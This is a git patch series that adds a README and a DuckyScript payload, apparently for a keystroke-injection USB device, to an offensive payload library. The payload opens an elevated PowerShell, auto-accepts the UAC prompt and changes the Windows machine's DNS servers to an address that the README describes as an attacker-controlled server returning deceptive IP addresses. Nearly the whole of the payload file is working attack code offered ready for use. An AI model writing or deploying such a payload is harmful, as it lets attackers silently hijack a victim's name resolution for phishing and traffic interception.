From 203d986ae4b167a57a0f5cedce136508f7d079bf Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Sat, 2 Nov 2024 14:57:52 +0100
Subject: [PATCH 1/2] Create README.md

---
 .../library/execution/DNS_spoofer/README.md   | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 payloads/library/execution/DNS_spoofer/README.md

diff --git a/payloads/library/execution/DNS_spoofer/README.md b/payloads/library/execution/DNS_spoofer/README.md
new file mode 100644
index 0000000..d8e199a
--- /dev/null
+++ b/payloads/library/execution/DNS_spoofer/README.md
@@ -0,0 +1,27 @@
+# Spoof DNS - Windows ✅
+
+DNS Spoofer
+
+## Description
+
+A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
+
+### Settings
+
+* Set the primary and secondary dns servers
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

From 1a1c79d5baed747dc92041a5cdf5672b9a78bc7b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Sat, 2 Nov 2024 14:58:12 +0100
Subject: [PATCH 2/2] Create payload.txt

---
 .../library/execution/DNS_spoofer/payload.txt | 69 +++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 payloads/library/execution/DNS_spoofer/payload.txt

diff --git a/payloads/library/execution/DNS_spoofer/payload.txt b/payloads/library/execution/DNS_spoofer/payload.txt
new file mode 100644
index 0000000..14dd010
--- /dev/null
+++ b/payloads/library/execution/DNS_spoofer/payload.txt
@@ -0,0 +1,69 @@
+REM Title: DNS changer
+REM Author: luu176
+REM Description: Changes DNS address of windows machine in powershell
+REM Target: Windows 10/11
+
+REM wifi interface should be named: Wi-Fi
+DEFINE #interface Ethernet
+DEFINE #primaryDNS 192.168.1.3
+DEFINE #secondaryDNS 1.1.1.1
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+GUI r
+DELAY 150
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 500
+STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
+REM below is to blink the LED when payload done
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE